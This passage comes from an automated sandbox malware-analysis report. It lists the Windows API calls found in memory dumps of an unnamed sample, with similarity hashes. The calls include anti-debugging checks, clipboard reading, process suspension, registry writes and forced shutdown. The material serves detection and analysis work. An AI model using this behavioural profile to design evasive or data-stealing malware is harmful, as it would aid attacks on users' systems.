                                                                                                                                                                                                                              • API ID: Service$Open$CloseHandleManagerStart
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2553746010-0
                                                                                                                                                                                                                              • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                                                                                                                                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindResourceA.KERNEL32(0046BC64,0000000A,00000000), ref: 0041A650
                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                                                                                                              • Opcode ID: 3ac26760cbdab8eb3590cfb2e9ceaadff88a164dc690ffee4326612eb302d7ce
                                                                                                                                                                                                                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ac26760cbdab8eb3590cfb2e9ceaadff88a164dc690ffee4326612eb302d7ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                                              • Opcode ID: 41a783eebac27e52ab0c36b15521a89ad0f9566ac3c2cd9b8cb047674ec061c1
                                                                                                                                                                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41a783eebac27e52ab0c36b15521a89ad0f9566ac3c2cd9b8cb047674ec061c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000000), ref: 0041595B
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0046B9C0,0046B9B0), ref: 00415970
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressExitLibraryLoadProcWindows
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1366546845-0
                                                                                                                                                                                                                              • Opcode ID: 7fe1e36e00b424c82458e3f866202df99e24f7a50d2e8fad2aa61880974a3470
                                                                                                                                                                                                                              • Instruction ID: 6bc3f647bab7108089c0dcdc07fd09c9fbb8658020a1caf9a12050c3981919ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fe1e36e00b424c82458e3f866202df99e24f7a50d2e8fad2aa61880974a3470
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA217F70604701E6CB10F7B19856AEF225A9F81748F54883FB802A72D2EF7CDC85865F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A755
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A75F
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0043A76C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 8927051c792ea5fcfde74a911610789cb41c0badf1ce26303590c400d5146ce6
                                                                                                                                                                                                                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8927051c792ea5fcfde74a911610789cb41c0badf1ce26303590c400d5146ce6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                                              • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004325C5,00000034), ref: 0043294C
                                                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,00000034,?,?,00000000,00000000,00000001,F0000000,?,?,004325C5,00000034), ref: 00432962
                                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,00000034,?,?,00000000,00000000,00000001,F0000000,?,?,004325C5,00000034), ref: 00432974
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,0044252A,00000000,0046DAE0,0000000C,00442681,00000000,00000002,00000000), ref: 00442575
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044252A,00000000,0046DAE0,0000000C,00442681,00000000,00000002,00000000), ref: 0044257C
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                                              • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3), ref: 0041ACCC
                                                                                                                                                                                                                              • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150C3), ref: 0041ACE2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1999457699-0
                                                                                                                                                                                                                              • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                              • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8), ref: 0041ACF8
                                                                                                                                                                                                                              • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150E8), ref: 0041AD0E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3614150671-0
                                                                                                                                                                                                                              • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                              • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0040AE21
                                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0040AE2D
                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040AE35
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2058664381-0
                                                                                                                                                                                                                              • Opcode ID: cfa778264f57a8a116f17f37051d88ccacc8ff9770acf02ecd02cad442be8df3
                                                                                                                                                                                                                              • Instruction ID: 95e153bd68fdccc55220e0a799c072a9f76a89096ec554d0853145a40c9ddfaa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfa778264f57a8a116f17f37051d88ccacc8ff9770acf02ecd02cad442be8df3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76E0EC31689311ABC2126B60EC09B9BBA589F40B62F44843ABE45A62D1D678CC10D6EA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,<gF), ref: 004126E1
                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(<gF,?,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,hHgF,0046673C), ref: 00412709
                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,hHgF,0046673C), ref: 00412714
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                              • String ID: Control Panel\Desktop
                                                                                                                                                                                                                              • API String ID: 4127273184-27424756
                                                                                                                                                                                                                              • Opcode ID: 009af8fa814201267122ee3b5958dfbbe0a45010e1ebb7388be65a4a218e9340
                                                                                                                                                                                                                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 009af8fa814201267122ee3b5958dfbbe0a45010e1ebb7388be65a4a218e9340
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,<gF), ref: 004126E1
                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(<gF,?,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,hHgF,0046673C), ref: 00412709
                                                                                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,hHgF,0046673C), ref: 00412714
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                              • String ID: Control Panel\Desktop
                                                                                                                                                                                                                              • API String ID: 4127273184-27424756
                                                                                                                                                                                                                              • Opcode ID: 9ad812ffb047586b4ba930fdc099551f60d7f241065d3487fcde7f032f61c132
                                                                                                                                                                                                                              • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ad812ffb047586b4ba930fdc099551f60d7f241065d3487fcde7f032f61c132
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F2B
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                                                                                                                                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                              • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                                                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                                                                                                              APIs
